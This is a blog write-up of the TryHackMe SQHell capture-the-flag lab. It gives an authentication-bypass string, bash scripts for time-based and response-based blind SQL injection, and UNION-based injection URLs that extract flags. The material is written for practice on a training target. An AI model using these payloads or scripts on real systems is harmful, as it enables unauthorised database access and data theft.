Post

TryHackMe SQHell Writeup

Posted
By x3ric
1 min read

https://tryhackme.com/r/room/sqhell

Explore SQL injection techniques with the TryHackMe SQHell CTF challenge, a medium-level exercise. This concise write-up simplifies key SQL techniques, including time-based attacks, to help you master advanced exploitation methods.

Add Hosts

Edit the /etc/hosts file and add the following entries:

1

<ip> sqhell.thm

Script to add hosts automatically

1
2

ip="<ip>";domain="sqhell.thm"
sudo grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts

Flag 1. Authentication Bypass SQLi

http://sqhell.thm/login

' OR 1=1;--

Flag 2. Time-Based SQLi

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

site="sqhell.thm"
characterlist="ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789{}:"
flag=""
counter=1
while true; do
    for char in $(echo "$characterlist" | grep -o .); do
        payload="1' AND (SELECT sleep(2) FROM flag WHERE SUBSTR(flag,$counter,1) = '$char') AND '1'='1"
        start=$(date +%s)
        curl -s -o /dev/null -H "X-Forwarded-For: $payload" "http://$site"
        end=$(date +%s)
        duration=$(( end - start ))
        if [ "$duration" -ge 2 ]; then
            flag+="$char"
            ((counter++))
            echo "Current flag: $flag"
            break
        fi
    done
    if [ ${#flag} -ge 43 ]; then
        echo "The Flag is: $flag"
        break
    fi
done

Flag 3. Response-Based SQLi

Note: URL encoding in the script requires jq. Install it using your package manager;

for Arch Linux, use sudo pacman -S jq.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21

site="sqhell.thm"
characterlist="ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789{}:"
flag=""
counter=1
while true; do
    for char in $(echo "$characterlist" | grep -o .); do
        payload="admin' AND (substr((SELECT flag FROM flag LIMIT 0,1),${counter},1)) = '${char}';-- -"
        encoded_payload=$(echo "$payload" | jq -sRr @uri)
        response=$(curl -s "http://${site}/register/user-check?username=${encoded_payload}")
        if echo "$response" | grep -q 'false'; then
            flag+="$char"
            counter=$((counter + 1))
            echo "Current flag: $flag"
            break
        fi
    done
    if [ ${#flag} -ge 43 ]; then
        echo "The Flag is: $flag"
        break
    fi
done

Flag 4. Union-Based SQLi

http://sqhell.thm/user?id=-1 UNION ALL SELECT "1 UNION SELECT 1,flag,3,4 FROM flag-- -",1,2 FROM users

Flag 5. Union-Based SQLi

http://sqhell.thm/post?id=-1 UNION ALL SELECT NULL,NULL,flag,NULL FROM flag-- -

ctf
thm cft writeup
This post is licensed under CC BY 4.0 by the author.